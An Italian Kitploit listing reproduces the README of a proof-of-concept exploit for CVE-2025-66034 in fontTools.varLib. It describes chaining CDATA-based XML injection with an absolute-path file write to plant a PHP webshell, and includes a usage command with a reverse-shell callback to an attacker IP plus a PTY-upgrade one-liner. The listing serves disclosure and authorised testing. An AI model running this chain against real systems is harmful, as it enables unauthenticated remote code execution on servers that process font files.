Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-66034 — CVE-2025-66034 - fontTools varLib Scrittura arbitraria di file → RCE PoC exploit per una vulnerabilità di Scrittura arbitraria di file + Iniezione XML in fontTools.varLib. | Kitploit
Strumenti/GitHubGitHub/4nuxd/cve-2025-66034
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebCTFPenetration TestingSviluppo Payload
GitHub4nuxd/cve-2025-66034

CVE-2025-66034

CVE-2025-66034 - fontTools varLib Scrittura arbitraria di file → RCE PoC exploit per una vulnerabilità di Scrittura arbitraria di file + Iniezione XML in fontTools.varLib.

Vedi Repository
4 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-66034 — fontTools varLib Scrittura Arbitraria di File → RCE

PoC exploit per una vulnerabilità di Scrittura Arbitraria di File + Iniezione XML in fontTools.varLib Testato su HackTheBox — VarIaType


Vulnerabilità

fontTools.varLib elabora file XML .designspace per creare font variabili. Due debolezze si combinano per ottenere RCE senza autenticazione:

#PrimitivaDettaglio
1Iniezione XML tramite suddivisione CDATAIl contenuto controllato dall'attaccante all'interno di <labelname> viene scritto letteralmente nel corpo del file font di output, consentendo l'iniezione di dati arbitrari
2Scrittura Arbitraria di File tramite bypass di os.path.join()L'attributo filename di <variable-font> accetta un percorso assoluto. Quando passato a os.path.join(), scarta la directory di output prevista e scrive in qualsiasi percorso del filesystem specificato dall'attaccante

Concatenando entrambe le primitive è possibile scrivere una webshell PHP in un percorso accessibile via web, ottenendo un'esecuzione di codice remota senza autenticazione.


Utilizzo

root@kitploit:~
python3 font_varlib.py \
  --ip <attacker-ip> \
  --port <port> \
  --upload http://target.htb/tools/variable-font-generator/process \
  --webroot /var/www/portal.target.htb/public/files \
  --shell http://portal.target.htb/files

Opzioni

Dipendenze

root@kitploit:~
pip install requests fonttools

Come Funziona

  1. Font master — Due file .ttf minimi (source-light.ttf, source-regular.ttf) vengono generati utilizzando fontTools.FontBuilder come master richiesti per il designspace
  2. .designspace malevolo — Viene creato un file XML appositamente modificato con:
    • Webshell PHP iniettata tramite una suddivisione CDATA all'interno di <labelname>
    • Percorso di scrittura assoluto impostato come filename di <variable-font>, bypassando output_dir tramite os.path.join()
  3. Caricamento — Il .designspace + i font master vengono inviati tramite POST all'endpoint di elaborazione
  4. Attivazione — Il file .php piantato viene richiesto, eseguendo il payload della reverse shell

Divulgazione

Campo
CVECVE-2025-66034
Componente interessatofontTools.varLib
ImpattoScrittura Arbitraria di File non autenticata → Esecuzione di Codice Remota
ContestoApplicazione web che espone un endpoint di elaborazione font

Legale

Questo strumento è destinato esclusivamente a test di penetrazione autorizzati e uso in CTF. Non eseguirlo su sistemi che non possiedi o per cui non hai esplicito permesso scritto di test.


di 4nuxd

Scarica lo strumento
FlagDescrizione
--ipIP dell'attaccante per il callback della reverse shell
--portPorta in ascolto
--uploadURL completo dell'endpoint di elaborazione font (POST)
--webrootPercorso assoluto lato server che corrisponde a una directory accessibile via web
--shellURL base sotto cui la webshell sarà accessibile
--no-listenSalta l'ascolto automatico — stampa invece i comandi manuali
--pwncatUsa pwncat-cs invece di nc (preferito se disponibile)
  • Aggiornamento TTY — Alla connessione, lo script genera automaticamente un PTY tramite python3 -c 'import pty; pty.spawn("/bin/bash")' e imposta TERM + stty per una shell completamente interattiva